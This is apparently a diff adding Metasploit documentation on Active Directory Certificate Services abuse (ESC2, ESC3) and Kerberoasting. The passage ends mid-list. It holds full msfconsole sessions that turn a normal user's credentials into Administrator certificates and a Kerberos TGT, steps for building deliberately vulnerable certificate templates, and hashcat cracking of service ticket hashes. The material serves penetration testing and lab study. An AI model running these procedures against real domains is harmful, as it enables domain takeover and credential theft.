+To do this we will use the `ipcr_cert` module and we will set the usual options, however we will need to run it twice. This is because with ESC2, we can't use the vulnerability to request authentication certificates as other users without the `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` flag being set on the template. Instead what we can do is use the Any Purpose EKU or SubCA EKU that are set on these certificates to authenticate to the domain as the user who requested the certificate. So what we do is first get a ESC2 vulnerable certificate, then abuse the ability to use that certificate for any purpose to then request a certificate on behalf of another user, using that certificate as the form of authentication for this operation.
+
+For the first run, we will set the usual `RHOSTS`, `CA`, and `CERT_TEMPLATE` details, being sure to set `CERT_TEMPLATE` to the vulnerable `ESC2-Template` certificate template, and supply valid SMB login credentials. This will grant us a certificate for our current user that is based off of the vulnerable `ESC2-Template`:
+
+```
+msf6 > use auxiliary/admin/dcerpc/icpr_cert
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
+RHOSTS => 172.30.239.85
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA daforest-WIN-BR0CCBA815B-CA
+CA => daforest-WIN-BR0CCBA815B-CA
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC2-Template
+CERT_TEMPLATE => ESC2-Template
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain DAFOREST
+SMBDomain => DAFOREST
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normaluser
+SMBPass => normaluser
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normal
+SMBUser => normal
+msf6 auxiliary(admin/dcerpc/icpr_cert) > show options
+
+Module options (auxiliary/admin/dcerpc/icpr_cert):
+
+   Name           Current Setting              Required  Description
+   ----           ---------------              --------  -----------
+   ALT_DNS                                     no        Alternative certificate DNS
+   ALT_UPN                                     no        Alternative certificate UPN (format: USER@DOMAIN)
+   CA             daforest-WIN-BR0CCBA815B-CA  yes       The target certificate authority
+   CERT_TEMPLATE  ESC2-Template                yes       The certificate template
+   ON_BEHALF_OF                                no        Username to request on behalf of (format: DOMAIN\USER)
+   PFX                                         no        Certificate to request on behalf of
+   RHOSTS         172.30.239.85                yes       The target host(s), see https://github.com/rapid7/metas
+                                                         ploit-framework/wiki/Using-Metasploit
+   RPORT          445                          yes       The target port (TCP)
+   SMBDomain      DAFOREST                     no        The Windows domain to use for authentication
+   SMBPass        normaluser                   no        The password for the specified username
+   SMBUser        normal                       no        The username to authenticate as
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   REQUEST_CERT  Request a certificate
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 172.30.239.85
+
+[*] 172.30.239.85:445 - Requesting a certificate...
+[+] 172.30.239.85:445 - The requested certificate was issued.
+[*] 172.30.239.85:445 - Certificate UPN: normal@daforest.com
+[*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3290009963-1772292745-3260174523-1611
+[*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216154930_default_unknown_windows.ad.cs_104207.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) > loot
+
+Loot
+====
+
+host  service  type           name             content               info                         path
+----  -------  ----           ----             -------               ----                         ----
+               windows.ad.cs  certificate.pfx  application/x-pkcs12  DAFOREST\normal Certificate  /home/gwillcox/.msf4/loot/20221216154930_default_unknown_windows.ad.cs_104207.pfx
+
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```
+
+Next, we need to use the PFX file that we got to request another certificate to authenticate on behalf of another user. We will use the `PFX` option to specify the PFX file, and the `ON_BEHALF_OF` setting to specify the user we would like to authenticate on behalf of. Finally we will change the certificate template to another certificate template that we are able to enroll in. The default `User` certificate should work here since it allows enrollment by any authenticated domain user.
+
+```
+msf6 auxiliary(admin/dcerpc/icpr_cert) > show options
+
+Module options (auxiliary/admin/dcerpc/icpr_cert):
+
+   Name           Current Setting              Required  Description
+   ----           ---------------              --------  -----------
+   ALT_DNS                                     no        Alternative certificate DNS
+   ALT_UPN                                     no        Alternative certificate UPN (format: USER@DOMAIN)
+   CA             daforest-WIN-BR0CCBA815B-CA  yes       The target certificate authority
+   CERT_TEMPLATE  ESC2-Template                yes       The certificate template
+   ON_BEHALF_OF                                no        Username to request on behalf of (format: DOMAIN\USER)
+   PFX                                         no        Certificate to request on behalf of
+   RHOSTS         172.30.239.85                yes       The target host(s), see https://github.com/rapid7/metas
+                                                         ploit-framework/wiki/Using-Metasploit
+   RPORT          445                          yes       The target port (TCP)
+   SMBDomain      DAFOREST                     no        The Windows domain to use for authentication
+   SMBPass        normaluser                   no        The password for the specified username
+   SMBUser        normal                       no        The username to authenticate as
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   REQUEST_CERT  Request a certificate
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF DAFOREST\\Administrator
+ON_BEHALF_OF => DAFOREST\Administrator
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/gwillcox/.msf4/loot/20221216154930_default_unknown_windows.ad.cs_104207.pfx
+PFX => /home/gwillcox/.msf4/loot/20221216154930_default_unknown_windows.ad.cs_104207.pfx
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User
+CERT_TEMPLATE => User
+msf6 auxiliary(admin/dcerpc/icpr_cert) > show options
+
+Module options (auxiliary/admin/dcerpc/icpr_cert):
+
+   Name           Current Setting                 Required  Description
+   ----           ---------------                 --------  -----------
+   ALT_DNS                                        no        Alternative certificate DNS
+   ALT_UPN                                        no        Alternative certificate UPN (format: USER@DOMAIN)
+   CA             daforest-WIN-BR0CCBA815B-CA     yes       The target certificate authority
+   CERT_TEMPLATE  User                            yes       The certificate template
+   ON_BEHALF_OF   DAFOREST\Administrator          no        Username to request on behalf of (format: DOMAIN\USE
+                                                            R)
+   PFX            /home/gwillcox/.msf4/loot/2022  no        Certificate to request on behalf of
+                  1216154930_default_unknown_win
+                  dows.ad.cs_104207.pfx
+   RHOSTS         172.30.239.85                   yes       The target host(s), see https://github.com/rapid7/me
+                                                            tasploit-framework/wiki/Using-Metasploit
+   RPORT          445                             yes       The target port (TCP)
+   SMBDomain      DAFOREST                        no        The Windows domain to use for authentication
+   SMBPass        normaluser                      no        The password for the specified username
+   SMBUser        normal                          no        The username to authenticate as
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   REQUEST_CERT  Request a certificate
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 172.30.239.85
+
+[*] 172.30.239.85:445 - Requesting a certificate...
+[+] 172.30.239.85:445 - The requested certificate was issued.
+[*] 172.30.239.85:445 - Certificate UPN: Administrator@daforest.com
+[*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3290009963-1772292745-3260174523-500
+[*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216155701_default_unknown_windows.ad.cs_756798.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) > loot
+
+Loot
+====
+
+host  service  type           name             content               info                         path
+----  -------  ----           ----             -------               ----                         ----
+               windows.ad.cs  certificate.pfx  application/x-pkcs12  DAFOREST\normal Certificate  /home/gwillcox/.msf4/loot/20221216154930_default_unknown_windows.ad.cs_104207.pfx
+               windows.ad.cs  certificate.pfx  application/x-pkcs12  DAFOREST\normal Certificate  /home/gwillcox/.msf4/loot/20221216155701_default_unknown_windows.ad.cs_756798.pfx
+
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```
+
+We can then use the `kerberos/get_ticket` module to gain a Kerberos ticket granting ticket (TGT) as the `Administrator`
+domain administrator. See the [Getting A Kerberos Ticket](#getting-a-kerberos-ticket) section for more information.
+
+# Exploiting ESC3 To Gain Domain Administrator Privileges
+To exploit ESC3 vulnerable templates we will use a similar process to ESC2 templates but with slightly different steps. First, lets return to the earlier output where we can find several templates that are vulnerable to ESC3 attacks. However we need to split them by attack vector. The reason is that the first half of this attack needs to use the ESC3_TEMPLATE_1 vulnerable certificate templates to enroll in a certificate template that has the Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1) that allows one to request certificates on behalf of other principals (such as users or computers).
+
+The second part of this attack will then require that we co-sign requests for another certificate using the certificate that we just got, to then request a certificate that can authenticate to the domain on behalf of another user. To do this we will need to look for certificates in the `ldap_esc_vulnerable_cert_finder` module which are labeled as being vulnerable to the ESC3_TEMPLATE_2 attack.
+
+The list of ESC3_TEMPLATE_1 vulnerable templates is pretty short and consists of a single template:
+- ESC3-TEMPLATE-1 - Vulnerable to ESC3_TEMPLATE_1 and allows enrollment via any authenticated domain user.
+
+ESC3_TEMPLATE_2 are more plentiful though and we can find a few that are of interest:
+- SubCA - Again as mentioned earlier can only be enrolled in by Doman Admins and Enterprise Admins, so not a viable vector.
+- ESC3-Template2 - Enrollable via any authenticated domain user.
+- User - Enrollable via any authenticated domain user.
+- Administrator -  Can only be enrolled in by Doman Admins and Enterprise Admins, so not a viable vector.
+- Machine - No real overlap between Domain Computers and Authenticated Users I don't think?
+- DomainController - Can only be enrolled in by Domain Admins and Enterprise Admins, so not a viable vector.
+
+Narrowing this list down to those we can actually enroll in as users, this leaves us with  `User` and `ESC3-Template2` as templates that can be used for the second part of this vulnerability.
+
+We'll first get the cert using `ipcr_cert` with the `ESC3-Template1` certificate.
+
+```
+msf6 > use auxiliary/admin/dcerpc/icpr_cert
+msf6 auxiliary(admin/dcerpc/icpr_cert) > show options
+
+Module options (auxiliary/admin/dcerpc/icpr_cert):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   ALT_DNS                         no        Alternative certificate DNS
+   ALT_UPN                         no        Alternative certificate UPN (format: USER@DOMAIN)
+   CA                              yes       The target certificate authority
+   CERT_TEMPLATE  User             yes       The certificate template
+   ON_BEHALF_OF                    no        Username to request on behalf of (format: DOMAIN\USER)
+   PFX                             no        Certificate to request on behalf of
+   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framew
+                                             ork/wiki/Using-Metasploit
+   RPORT          445              yes       The target port (TCP)
+   SMBDomain      .                no        The Windows domain to use for authentication
+   SMBPass                         no        The password for the specified username
+   SMBUser                         no        The username to authenticate as
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   REQUEST_CERT  Request a certificate
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normal
+SMBUser => normal
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normaluser
+SMBPass => normaluser
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain DAFOREST
+SMBDomain => DAFOREST
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
+RHOSTS => 172.30.239.85
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA daforest-WIN-BR0CCBA815B-CA
+CA => daforest-WIN-BR0CCBA815B-CA
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC3-Template1
+CERT_TEMPLATE => ESC3-Template1
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 172.30.239.85
+
+[*] 172.30.239.85:445 - Requesting a certificate...
+[+] 172.30.239.85:445 - The requested certificate was issued.
+[*] 172.30.239.85:445 - Certificate UPN: normal@daforest.com
+[*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3290009963-1772292745-3260174523-1611
+[*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) > loot
+
+Loot
+====
+
+host  service  type           name             content               info                         path
+----  -------  ----           ----             -------               ----                         ----
+               windows.ad.cs  certificate.pfx  application/x-pkcs12  DAFOREST\normal Certificate  /home/gwillcox/.msf4/loot/20221216173718_default_unknown_windows.ad.cs_580032.pfx
+               windows.ad.cs  certificate.pfx  application/x-pkcs12  DAFOREST\normal Certificate  /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx
+
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```
+
+Next we'll try use this certificate to request another certificate on behalf of a different user. For this stage we need to specify another certificate that is vulnerable to the ESC3_TEMPLATE_2 attack vector that we are able to enroll in. We will use the `User` template for this:
+
+```
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx
+PFX => /home/gwillcox/.msf4/loot/20221216174221_default_unknown_windows.ad.cs_027866.pfx
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF DAFOREST\\Administrator
+ON_BEHALF_OF => DAFOREST\Administrator
+msf6 auxiliary(admin/dcerpc/icpr_cert) > show options
+
+Module options (auxiliary/admin/dcerpc/icpr_cert):
+
+   Name           Current Setting                 Required  Description
+   ----           ---------------                 --------  -----------
+   ALT_DNS                                        no        Alternative certificate DNS
+   ALT_UPN                                        no        Alternative certificate UPN (format: USER@DOMAIN)
+   CA             daforest-WIN-BR0CCBA815B-CA     yes       The target certificate authority
+   CERT_TEMPLATE  ESC3-Template1                  yes       The certificate template
+   ON_BEHALF_OF   DAFOREST\Administrator          no        Username to request on behalf of (format: DOMAIN\USE
+                                                            R)
+   PFX            /home/gwillcox/.msf4/loot/2022  no        Certificate to request on behalf of
+                  1216174221_default_unknown_win
+                  dows.ad.cs_027866.pfx
+   RHOSTS         172.30.239.85                   yes       The target host(s), see https://github.com/rapid7/me
+                                                            tasploit-framework/wiki/Using-Metasploit
+   RPORT          445                             yes       The target port (TCP)
+   SMBDomain      DAFOREST                        no        The Windows domain to use for authentication
+   SMBPass        normaluser                      no        The password for the specified username
+   SMBUser        normal                          no        The username to authenticate as
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   REQUEST_CERT  Request a certificate
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User
+CERT_TEMPLATE => User
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 172.30.239.85
+
+[*] 172.30.239.85:445 - Requesting a certificate...
+[+] 172.30.239.85:445 - The requested certificate was issued.
+[*] 172.30.239.85:445 - Certificate UPN: Administrator@daforest.com
+[*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3290009963-1772292745-3260174523-500
+[*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216174559_default_unknown_windows.ad.cs_570105.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```
+
+Just to show this is also possible with `ESC3-Template2` here is a snippet showing that also works:
+
+```
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC3-Template2
+CERT_TEMPLATE => ESC3-Template2
+msf6 auxiliary(admin/dcerpc/icpr_cert) > show options
+
+Module options (auxiliary/admin/dcerpc/icpr_cert):
+
+   Name           Current Setting                 Required  Description
+   ----           ---------------                 --------  -----------
+   ALT_DNS                                        no        Alternative certificate DNS
+   ALT_UPN                                        no        Alternative certificate UPN (format: USER@DOMAIN)
+   CA             daforest-WIN-BR0CCBA815B-CA     yes       The target certificate authority
+   CERT_TEMPLATE  ESC3-Template2                  yes       The certificate template
+   ON_BEHALF_OF   DAFOREST\Administrator          no        Username to request on behalf of (format: DOMAIN\USE
+                                                            R)
+   PFX            /home/gwillcox/.msf4/loot/2022  no        Certificate to request on behalf of
+                  1216174221_default_unknown_win
+                  dows.ad.cs_027866.pfx
+   RHOSTS         172.30.239.85                   yes       The target host(s), see https://github.com/rapid7/me
+                                                            tasploit-framework/wiki/Using-Metasploit
+   RPORT          445                             yes       The target port (TCP)
+   SMBDomain      DAFOREST                        no        The Windows domain to use for authentication
+   SMBPass        normaluser                      no        The password for the specified username
+   SMBUser        normal                          no        The username to authenticate as
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   REQUEST_CERT  Request a certificate
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 172.30.239.85
+
+[*] 172.30.239.85:445 - Requesting a certificate...
+[+] 172.30.239.85:445 - The requested certificate was issued.
+[*] 172.30.239.85:445 - Certificate UPN: Administrator@daforest.com
+[*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3290009963-1772292745-3260174523-500
+[*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216180342_default_unknown_windows.ad.cs_390825.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```
+
+We can then use the `kerberos/get_ticket` module to gain a Kerberos ticket granting ticket (TGT) as the `Administrator`
+domain administrator. See the [Getting A Kerberos Ticket](#getting-a-kerberos-ticket) section for more information.
+
+# Getting A Kerberos Ticket
+Once a certificate for a user has been claimed, that certificate can be used to issue a Kerberos ticket granting ticket
+(TGT) which in tern can be used to authenticate to services.
+
+Ticket granting tickets can be requested using the [[kerberos/get_ticket|kerberos/get_ticket.md]] module by specifying
+the `CERT_FILE` option. Take the certificate file from the last stage of the attack and set it as the `CERT_FILE`.
+Certificates from Metasploit do not require a password, but if the certificate was generated from a source that added
+one, it can be specified in the `CERT_PASSWORD` option. Set the `RHOST` datastore option to the Domain Controller, then
+run the `GET_TGT` action.
+
+```
+msf6 > use kerberos/get_ticket
+
+Matching Modules
+================
+
+   #  Name                                 Disclosure Date  Rank    Check  Description
+   -  ----                                 ---------------  ----    -----  -----------
+   0  auxiliary/admin/kerberos/get_ticket                   normal  No     Kerberos TGT/TGS Ticket Requester
+
+
+Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/kerberos/get_ticket
+
+[*] Using auxiliary/admin/kerberos/get_ticket
+msf6 auxiliary(admin/kerberos/get_ticket) > get_tgt rhosts=192.168.159.10 cert_file=/home/smcintyre/.msf4/loot/20230124173224_default_192.168.159.10_windows.ad.cs_287833.pfx
+[*] Running module against 192.168.159.10
+
+[*] 192.168.159.10:88 - Getting TGT for smcintyre@msflab.local
+[+] 192.168.159.10:88 - Received a valid TGT-Response
+[*] 192.168.159.10:88 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230124202354_default_192.168.159.10_mit.kerberos.cca_566767.bin
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/kerberos/get_ticket) > klist
+Kerberos Cache
+==============
+host            principal               sname                             issued                     status  path
+----            ---------               -----                             ------                     ------  ----
+192.168.159.10  smcintyre@MSFLAB.LOCAL  krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL  2023-01-24 20:23:54 -0500  valid   /home/smcintyre/.msf4/loot/20230124202354_default_192.168.159.10_mit.kerberos.cca_566767.bin
+
+msf6 auxiliary(admin/kerberos/get_ticket) >
+```
+
+Once the TGT has been issued, it can be seen in the output of the `klist` command. With the TGT saved, it will
+automatically be used in the future to request ticket granting services (TGS) for authentication to specific services.
@@ -0,0 +1,114 @@
+## What is AD CS?
+
+Active Directory Certificate Services, also known as AD CS, is an Active Directory tool for
+letting administrators issue and manage public key certificates that can be used to
+connect to various services and principals on the domain. It is often used to provide
+certificates that can be used in place of credentials for logging into a network, or to
+provide certificates that can be used to sign and verify the authenticity of data.
+
+The main guarantees that AD CS aims to provide are:
+- Confidentiality via encryption
+- Integrity via digital signatures
+- Authentication by associating certificate keys with computers, users, or device accounts
+  on a computer network.
+
+Given that AD CS often holds highly sensitive keys and access credentials for a corporate
+network, this makes it a prime target for attackers.
+
+## Required Ports for AD CS
+Active Directory requires the following TCP [ports](https://www.encryptionconsulting.com/ports-required-for-active-directory-and-pki/) 
+be open on all domain controllers, which heavily overlaps with the [ports](https://learn.microsoft.com/en-us/archive/blogs/pki/firewall-rules-for-active-directory-certificate-services) required for AD CS:
+
+- TCP/UDP port 53: DNS
+- TCP/UDP port 88: Kerberos authentication
+- TCP/UDP port 135: RPC
+- TCP/UDP port 137-138: NetBIOS
+- TCP/UDP port 389: LDAP
+- TCP/UDP port 445: SMB
+- TCP/UDP port 464: Kerberos password change
+- TCP/UDP port 636: LDAP SSL
+- TCP/UDP port 3268-3269: Global catalog
+
+AD CS additionally has the following requirements for Certificate Authorities:
+
+- TCP random port above 1023: RPC dynamic port allocation
+
+The following ports are optional depending on services used, and tend to apply to
+Certificate Enrollment Web Services:
+
+- TCP port 80: HTTP
+- TCP port 443: HTTPS
+- TCP port 445: SMB
+
+If using Active Directory Federation Services (ADFS) for single sign on the following ports are
+also required:
+
+- TCP port 80: HTTP
+- TCP port 443: HTTPS
+- TCP port 49443: ADFS
+
+## Core Concepts
+Microsoft provides a very useful [training module](https://learn.microsoft.com/en-us/training/modules/implement-manage-active-directory-certificate-services/) 
+that covers the fundamentals of AD CS and as well as examples which cover the management of certificate enrollment, certificate revocation and certificate trusts.
+
+## Setting up A Vulnerable AD CS Server
+The following steps assume that you have installed an AD CS on either a new or existing domain controller.
+### Installing AD CS
+1. Open the Server Manager
+2. Select Add roles and features
+3. Select "Active Directory Certificate Services" under the "Server Roles" section
+4. When prompted add all of the features and management tools
+5. On the AD CS "Role Services" tab, leave the default selection of only "Certificate Authority"
+6. Completion the installation and reboot the server
+7. Reopen the Server Manager
+8. Go to the AD CS tab and where it says "Configuration Required", hit "More" then "Configure Active Directory Certificate..."
+9. Select "Certificate Authority" in the Role Services tab
+10. Select "Enterprise CA" in the "Setup Type" tab (the user must be a Domain Administrator for this option to be available)
+11. Keep all of the default settings, noting the value of the "Common name for this CA" on the "CA Name" tab (this value corresponds to the `CA` datastore option)
+12. Accept the rest of the default settings and complete the configuration
+
+### Setting up a ESC1 Vulnerable Certificate Template
+1. Open up the run prompt and type in `certsrv`.
+2. In the window that appears you should see your list of certification authorities under `Certification Authority (Local)`. Right click on the folder in the drop down marked `Certificate Templates` and then click `Manage`.
+3. Scroll down to the `User` certificate. Right click on it and select `Duplicate Template`.
+4. From here you can refer to the following [Active-Directory-Certificate-Services-abuse](https://github.com/RayRRT/Active-Directory-Certificate-Services-abuse/blob/3da1d59f1b66dd0e381b2371b8fb42d87e2c9f82/ADCS.md) documentation for screenshots.
+5. Select the `General` tab and rename this to something meaningful like `ESC1-Template`, then click the `Apply` button.
+6. In the `Subject Name` tab, select `Supply in the request` and click `Ok` on the security warning that appears. Then click the `Apply` button.
+7. Scroll to the `Extensions` tab and under `Application Policies` ensure that `Client Authentication`, `Server Authentication`, `KDC Authentication`, or `Smart Card Logon`  is listed. Then click the `Apply` button.
+8. Under the `Security` tab make sure that `Domain Users` group listed and the `Enroll` permissions is marked as allowed for this group.
+9. Under `Issuance Requirements` tab, ensure that under `Require the following for enrollment` that the `CA certificate manager approval` box is unticked, as is the `This number of authorized signatures` box.
+10. Click `Apply` and then `Ok`
+11. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder. Then click `New` followed by `Certificate Template to Issue`.
+12. Scroll down and select the `ESC1-Template` certificate, or whatever you named the ESC1 template you created, and select `OK`. The certificate should now be available to be issued by the CA server.
+
+### Setting up a ESC2 Vulnerable Certificate Template
+1. Open up `certsrv`
+2. Scroll down to `Certificate Templates` folder, right click on it and select `Manage`.
+3. Find the `ESC1` certificate template you created earlier and right click on that, then select `Duplicate Template`.
+4. Select the `General` tab, and then name the template `ESC2-Template`. Then click `Apply`.
+5. Go to the `Subject Name` tab and select `Build from this Active Directory Information` and select `Fully distinguished name` under the `Subject Name Format`. The main idea of setting this option is to prevent being able to supply the subject name in the request as this is more what makes the certificate vulnerable to ESC1. The specific options here I don't think will matter so much so long as the `Supply in the request` option isn't ticked. Then click `Apply`.
+6. Go the to `Extensions` tab and click on `Application Policies`. Then click on `Edit`.
+7. Delete all the existing application policies by clicking on them one by one and clicking the `Remove` button.
+8. Click the `Add` button and select `Any Purpose` from the list that appears. Then click the `OK` button.
+9. Click the `Apply` button, and then `OK`. The certificate should now be created.
+10. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder. Then click `New` followed by `Certificate Template to Issue`.
+11. Scroll down and select the `ESC2-Template` certificate, or whatever you named the ESC2 template you created, and select `OK`. The certificate should now be available to be issued by the CA server.
+
+### Setting up a ESC3 Template 1 Vulnerable Certificate Template
+1. Follow the instructions above to duplicate the ESC2 template and name it `ESC3-Template1`, then click `Apply`.
+2. Go to the `Extensions` tab, click the Application Policies entry, click the `Edit` button, and remove the `Any Purpose` policy and replace it with `Certificate Request Agent`, then click `OK`.
+3. Click `Apply`.
+4. Go to `Issuance Requirements` tab and double check that both `CA certificate manager approval` and `This number of authorized signatures` are unchecked.
+5. Click `Apply` if any changes were made or the button is not grey'd out, then click `OK` to create the certificate.
+6. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder. Then click `New` followed by `Certificate Template to Issue`.
+7. Scroll down and select the `ESC3-Template1` certificate, or whatever you named the ESC3 template number 1 template you just created, and select `OK`. The certificate should now be available to be issued by the CA server.
+
+### Setting up a ESC3 Template 2 Vulnerable Certificate Template
+1. Follow the instructions above to duplicate the ESC2 template and name it `ESC3-Template2`, then click `Apply`.
+2. Go to the `Extensions` tab, click the Application Policies entry, click the `Edit` button, and remove the `Any Purpose` policy and replace it with `Client Authentication`, then click `OK`.
+3. Click `Apply`.
+4. Go to `Issuance Requirements` tab and double check that both `CA certificate manager approval` is unchecked.
+5. Check the `This number of authorized signatures` checkbox and ensure the value specified is 1, and that the `Policy type required in signature` is set to `Application Policy`, and that the `Application policy` value is `Certificate Request Agent`.
+6. Click `Apply` and then click `OK` to issue the certificate.
+7. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder. Then click `New` followed by `Certificate Template to Issue`.
+8. Scroll down and select the `ESC3-Template2` certificate, or whatever you named the ESC3 template number 2 template you just created, and select `OK`. The certificate should now be available to be issued by the CA server.
@@ -0,0 +1,404 @@
+## Kerberoasting
+
+Kerberoasting is a technique that finds Service Principal Names (SPN) in Active Directory that are associated with
+normal user accounts on the domain, and then requesting Ticket Granting Service (TGS) tickets for those accounts from
+the KDC. These TGS tickets are encrypted with the Service's password, which may be weak - and susceptible to brute force
+attacks.
+
+Services are normally configured to use computer accounts which have very long and secure passwords, but services
+associated with normal user accounts will have passwords entered by a human and may be short and weak - and a good
+target for brute attacks.
+
+If successful, the attacker possesses user credentials that can be used to impersonate the account owner. Now the attacker
+appears to be an approved and legitimate user - having access to the same privileges, assets, systems, etc, that have
+been granted to the compromised account, boom roasted.
+
+## Vulnerable Targets
+
+Any system leveraging Kerberos as a means of authentication e.g. Active Directory, MSSQL, which have Service Principal
+Names (SPN) associated with normal user accounts on the domain.
+
+## Lab Environment
+
+For testing purposes on an Active Directory environment you can create a user account and register an SPN manually as an
+example of this technique:
+
+```
+# Create a basic user account with a weak password for our service
+net user /add svc_kerberoastable password123
+
+# Mark the account and password as never expiring, to ensure the lab setup still works in the future
+net user svc_kerberoastable /expires:never
+powershell /c Set-AdUser -Identity svc_kerberoastable -PasswordNeverExpires $true
+
+# Create a Service Principal Name which uses the user account with a weak password
+cmd /c setspn -a %computername%/svc_kerberoastable.%userdnsdomain%:1337 %userdomain%\svc_kerberoastable
+```
+
+## Scenarios
+
+### Using get_user_spns
+
+The easiest way to enumerate Kerberoastable accounts is with the `auxiliary/gather/get_user_spns` module which internally leverages Impacket.
+This module will automatically query LDAP for Kerberoastable SPNs and request a Kerberos service ticket that may be encrypted using the weak password
+which can be bruteforced:
+
+```
+use auxiliary/gather/get_user_spns
+run rhost=192.168.123.13 user=<username> pass=<password> domain=<domain>
+```
+
+If you followed the lab setup setup above, this should output the following result:
+
+```
+msf6 auxiliary(gather/get_user_spns) > run rhost=192.168.123.13 user=Administrator pass=p4$$w0rd domain=adf3.local
+
+[*] Running for 192.168.123.13...
+[+] ServicePrincipalName                    Name                MemberOf  PasswordLastSet             LastLogon  Delegation
+[+] --------------------------------------  ------------------  --------  --------------------------  ---------  ----------
+[+] DC3/svc_kerberoastable.ADF3.LOCAL:1337  svc_kerberoastable            2023-01-23 23:52:19.445592  <never>
+[+] $krb5tgs$23$*svc_kerberoastable$ADF3.LOCAL$adf3.local/svc_kerberoastable*$c2e73c1dcdcef4c926cb263abedf75ed$263fea3ad446bd6b4b8... etc etc ...
+```
+
+The final line contains the service ticket hash in a crackable format. Next paste this hash `$krb5tgs$23$*svc_kerberoastable$ADF3.LOCAL$adf3.local/svc_kerberoastable*$c2e73c1..etc etc...` into a new file called `hash.txt`
+You can run Hashcat to crack the hash with a wordlist of choice, and see if the status of the hash has been marked as cracked:
+
+```
+$ hashcat -m 13100 --force -a 0 hash.txt /usr/share/wordlists/rockyou.txt
+... etc ...
+Session..........: hashcat
+Status...........: Cracked
+... etc ...
+```
+
+If the password has been cracked you can view the result at a later date with the above command and `--show` appended:
+
+```
+$ hashcat -m 13100 --force -a 0 hash.txt /usr/share/wordlists/rockyou.txt --show
+$krb5tgs$23$*svc_kerberoastable$ADF3.LOCAL$adf3.local/svc_kerberoastable*$c2e73c1dcdcef4c926cb...etc etc...:password123
+                                                                                                         ^ cracked password
+```
+
+Now that you have access to the password of the service account, you can use this to enumerate further in the AD environment.
+
+### Manual workflow
+
+An alternative to the easier `get_user_spns` module above is the more manual process of running the LDAP query module to
+find Kerberoastable accounts, requesting service tickets with Kiwi, converting the Kiwi ticket to a format usable by hashcat,
+and cracking the hash.
+
+1. Start msfconsole
+2. Obtain SPNs associated with user accounts from your target
+   1. Do: `use auxiliary/gather/ldap_query`
